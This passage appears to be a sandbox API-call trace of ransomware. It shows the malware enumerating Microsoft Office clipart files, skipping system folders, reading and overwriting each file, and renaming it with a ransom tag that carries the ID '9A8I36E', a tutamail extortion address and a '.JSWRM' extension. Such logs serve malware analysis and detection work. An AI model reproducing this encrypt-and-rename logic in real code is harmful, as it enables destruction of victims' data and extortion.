(in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0088.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0088.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0088.286] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xecb9a46, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xecb9a46, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xecb9a46, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x312c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0233665.WMF", cAlternateFileName="")) returned 1 [0088.286] lstrcmpiW (lpString1="J0233665.WMF", lpString2=".") returned 1 [0088.286] lstrcmpiW (lpString1="J0233665.WMF", lpString2="..") returned 1 [0088.286] lstrcmpiW (lpString1="J0233665.WMF", lpString2="...") returned 1 [0088.286] lstrcmpiW (lpString1="J0233665.WMF", lpString2="windows") returned -1 [0088.286] lstrcmpiW (lpString1="J0233665.WMF", lpString2="recovery") returned -1 [0088.286] lstrcmpiW (lpString1="J0233665.WMF", lpString2="perflogs") returned -1 [0088.286] lstrcmpiW (lpString1="J0233665.WMF", lpString2="documents and settings") returned 1 [0088.286] lstrcmpiW (lpString1="J0233665.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.286] lstrcmpiW (lpString1="J0233665.WMF", lpString2="system volume information") returned -1 [0088.286] lstrcmpiW (lpString1="J0233665.WMF", lpString2="msocache") returned -1 [0088.286] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0088.286] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0233665.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0233665.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0233665.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0088.287] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0088.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0233665.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0233665.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0233665.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0088.287] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0088.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0088.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.287] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0088.287] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0233665.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0233665.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.287] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=12588) returned 1 [0088.287] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.287] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3120) returned 0x24d210 [0088.287] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3120, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3120, lpOverlapped=0x0) returned 1 [0088.289] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.290] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3120, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3120, lpOverlapped=0x0) returned 1 [0088.290] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0088.290] CloseHandle (hObject=0x314) returned 1 [0088.290] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0088.290] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.290] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0088.290] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.290] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0088.290] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0088.290] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.290] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0088.290] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.290] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0088.290] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0088.290] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0088.290] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0088.290] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0088.290] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0233665.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0233665.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0233665.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0233665.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.325] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0088.325] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0088.325] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0088.325] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xecb9a46, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xecb9a46, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xecb9a46, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x975e, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0233992.WMF", cAlternateFileName="")) returned 1 [0088.325] lstrcmpiW (lpString1="J0233992.WMF", lpString2=".") returned 1 [0088.325] lstrcmpiW (lpString1="J0233992.WMF", lpString2="..") returned 1 [0088.325] lstrcmpiW (lpString1="J0233992.WMF", lpString2="...") returned 1 [0088.325] lstrcmpiW (lpString1="J0233992.WMF", lpString2="windows") returned -1 [0088.325] lstrcmpiW (lpString1="J0233992.WMF", lpString2="recovery") returned -1 [0088.325] lstrcmpiW (lpString1="J0233992.WMF", lpString2="perflogs") returned -1 [0088.325] lstrcmpiW (lpString1="J0233992.WMF", lpString2="documents and settings") returned 1 [0088.325] lstrcmpiW (lpString1="J0233992.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.325] lstrcmpiW (lpString1="J0233992.WMF", lpString2="system volume information") returned -1 [0088.325] lstrcmpiW (lpString1="J0233992.WMF", lpString2="msocache") returned -1 [0088.325] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0088.325] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0233992.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.325] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0233992.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0233992.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.325] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0088.325] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0088.325] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0233992.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.325] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0233992.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0233992.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.325] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0088.325] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0088.325] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0088.325] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.325] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.325] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0088.325] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0233992.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0233992.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.326] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=38750) returned 1 [0088.326] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.326] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x9750) returned 0x24d210 [0088.326] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x9750, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x9750, lpOverlapped=0x0) returned 1 [0088.330] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.330] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x9750, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x9750, lpOverlapped=0x0) returned 1 [0088.330] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0088.331] CloseHandle (hObject=0x314) returned 1 [0088.331] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0088.331] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.331] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0088.331] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.331] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0088.331] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0088.331] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.331] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0088.331] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.331] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0088.331] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0088.331] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0088.331] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0088.331] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0088.332] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0233992.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0233992.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0233992.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0233992.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.332] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0088.332] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0088.332] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0088.332] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xecb9a46, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xecb9a46, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xecb9a46, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xcec6, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0234000.WMF", cAlternateFileName="")) returned 1 [0088.332] lstrcmpiW (lpString1="J0234000.WMF", lpString2=".") returned 1 [0088.332] lstrcmpiW (lpString1="J0234000.WMF", lpString2="..") returned 1 [0088.332] lstrcmpiW (lpString1="J0234000.WMF", lpString2="...") returned 1 [0088.333] lstrcmpiW (lpString1="J0234000.WMF", lpString2="windows") returned -1 [0088.333] lstrcmpiW (lpString1="J0234000.WMF", lpString2="recovery") returned -1 [0088.333] lstrcmpiW (lpString1="J0234000.WMF", lpString2="perflogs") returned -1 [0088.333] lstrcmpiW (lpString1="J0234000.WMF", lpString2="documents and settings") returned 1 [0088.333] lstrcmpiW (lpString1="J0234000.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.333] lstrcmpiW (lpString1="J0234000.WMF", lpString2="system volume information") returned -1 [0088.333] lstrcmpiW (lpString1="J0234000.WMF", lpString2="msocache") returned -1 [0088.333] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0088.333] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0234000.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.333] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0234000.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0234000.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.333] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0088.333] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0088.333] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0234000.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.333] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0234000.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0234000.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.333] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0088.333] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0088.333] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0088.333] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.333] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.333] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0088.333] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0234000.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0234000.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.333] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=52934) returned 1 [0088.334] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.334] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xcec0) returned 0x24d210 [0088.334] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xcec0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xcec0, lpOverlapped=0x0) returned 1 [0088.354] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.354] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xcec0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xcec0, lpOverlapped=0x0) returned 1 [0088.355] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0088.355] CloseHandle (hObject=0x314) returned 1 [0088.356] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0088.356] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.356] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0088.356] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.356] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0088.356] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0088.356] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.356] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0088.356] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.356] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0088.356] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0088.356] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0088.356] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0088.356] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0088.356] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0234000.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0234000.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0234000.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0234000.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.357] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0088.357] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0088.357] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0088.357] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec9380a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xec9380a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xecb9a46, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4b40, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0234001.WMF", cAlternateFileName="")) returned 1 [0088.357] lstrcmpiW (lpString1="J0234001.WMF", lpString2=".") returned 1 [0088.357] lstrcmpiW (lpString1="J0234001.WMF", lpString2="..") returned 1 [0088.357] lstrcmpiW (lpString1="J0234001.WMF", lpString2="...") returned 1 [0088.357] lstrcmpiW (lpString1="J0234001.WMF", lpString2="windows") returned -1 [0088.357] lstrcmpiW (lpString1="J0234001.WMF", lpString2="recovery") returned -1 [0088.357] lstrcmpiW (lpString1="J0234001.WMF", lpString2="perflogs") returned -1 [0088.357] lstrcmpiW (lpString1="J0234001.WMF", lpString2="documents and settings") returned 1 [0088.357] lstrcmpiW (lpString1="J0234001.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.357] lstrcmpiW (lpString1="J0234001.WMF", lpString2="system volume information") returned -1 [0088.357] lstrcmpiW (lpString1="J0234001.WMF", lpString2="msocache") returned -1 [0088.357] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0088.357] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0234001.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.357] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0234001.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, 